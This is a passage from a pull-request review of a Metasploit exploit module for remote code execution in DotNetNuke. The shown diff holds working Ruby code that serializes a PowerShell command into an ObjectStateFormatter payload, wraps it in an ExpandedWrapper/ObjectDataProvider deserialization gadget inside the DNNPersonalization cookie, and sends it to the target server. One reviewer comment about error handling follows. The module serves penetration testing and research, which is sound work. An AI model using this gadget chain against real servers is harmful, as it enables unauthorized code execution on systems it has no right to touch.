modules/exploits/windows/http/dnn_cookie_deserialization_rce.rb

```diff
@@ -0,0 +1,966 @@
+    psh_cmd_bytes = psh_cmd.bytes.to_a
+
+    cmd_size_bytes = write_encoded_int(psh_cmd.length)
+
+    # Package payload into serialized object
+    payload_object = @osf_wrapper_start + cmd_size_bytes + psh_cmd_bytes + @osf_wrapper_end
+
+    object_size = write_encoded_int(payload_object.length)
+
+    # Create the final seralized ObjectStateFormatter payload
+    final_payload = @osf_header + object_size + payload_object
+
+    b64_payload = Base64.strict_encode64(final_payload.pack("C*"))
+    return b64_payload
+  end
+
+  # =============================================
+  # Reproduce the WriteEncoded method in
+  # the native .NET ObjectStateFormatter.cs file.
+  # =============================================
+  def write_encoded_int(value)
+    enc = []
+    while (value >= 0x80)
+      v = value | 0x80
+      enc.push([v].pack("V")[0].unpack1("C*"))
+      value >>= 7
+    end
+    enc.push([value].pack("V")[0].unpack1("C*"))
+    return enc
+  end
+
+  # =================================
+  # Creates the payload cookie
+  # using the specified payload
+  # =================================
+  def create_cookie(payload)
+    cookie = "<profile>"\
+             "<item key=\"k\" type=\"System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.ObjectStateFormatter, "\
+             "System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],"\
+             "[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, "\
+             "Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, "\
+             "Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\">"\
+             "<ExpandedWrapperOfObjectStateFormatterObjectDataProvider>"\
+             "<ProjectedProperty0>"\
+             "<MethodName>Deserialize</MethodName>"\
+             "<MethodParameters>"\
+             "<anyType xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\" "\
+             "xmlns:d=\"http://www.w3.org/2001/XMLSchema\" i:type=\"d:string\" "\
+             ">#{payload}</anyType>"\
+             "</MethodParameters>"\
+             "<ObjectInstance xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\" "\
+             "i:type=\"ObjectStateFormatter\" />"\
+             "</ProjectedProperty0>"\
+             "</ExpandedWrapperOfObjectStateFormatterObjectDataProvider>"\
+             "</item>"\
+             "</profile>"
+    return cookie
+  end
+
+  # =========================================
+  # Send the payload to the target server.
+  # =========================================
+  def execute_command(cookie_payload, opts = { dnn_host: host, dnn_port: port })
+    uri = normalize_uri(target_uri.path)
+
+    res = send_request_cgi(
+      'uri' => uri,
+      'cookie' => ".DOTNETNUKE=#{@session_token};DNNPersonalization=#{cookie_payload};"
+    )
+    if !res
+      fail_with(Failure::TimeoutExpired, "#{opts[:host]} - Connection timed out")
```

Comment:
Possibly also connection failure (`Failure::Unreachable`) ? I'm not sure which is preferred, but I believe `Unreachable` is traditional.